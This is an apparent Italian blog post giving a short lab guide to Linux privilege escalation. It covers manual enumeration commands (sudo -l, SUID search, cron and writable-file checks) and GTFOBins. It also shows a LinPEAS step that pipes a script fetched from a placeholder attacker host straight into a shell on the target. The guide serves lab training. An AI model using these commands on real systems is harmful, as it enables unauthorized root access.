💻 Software hacking Medio ⏱ 15 min 👁 9 visualizzazioni

Linux Privilege Escalation: guida pratica per lab

Davide Russo @CyberSec_Italia · 07/04/2026 · aggiornato 2 ore fa
**Privilege escalation** è l'arte di passare da utente normale a root dopo l'accesso iniziale. ## Prerequisiti - Accesso shell come utente normale (es. da Metasploitable) - Kali Linux come attaccante ## Check manuali fondamentali ```bash # Chi sono? id && whoami # Cosa posso fare con sudo? sudo -l # SUID binaries (possono eseguire come root) find / -perm -4000 -type f 2>/dev/null # Processi root ps aux | grep root # Crontab di sistema cat /etc/crontab ls -la /etc/cron* # File scrivibili find / -writable -type f 2>/dev/null | grep -v /proc # Versione kernel (cerca CVE) uname -a ``` ## LinPEAS — automazione ```bash # Dal sistema attaccante wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh python3 -m http.server 80 # Sulla macchina target curl http://ATTACKER_IP/linpeas.sh | sh ``` ## GTFOBins gtfobins.github.io — lista di binari che permettono privesc. Esempio: `find` con SUID → shell root. ## Lab consigliato TryHackMe: 'Linux PrivEsc' room — gratuita e guidata.

💬 Commenti (0)

Nessun commento ancora. Sii il primo!

Accedi per commentare.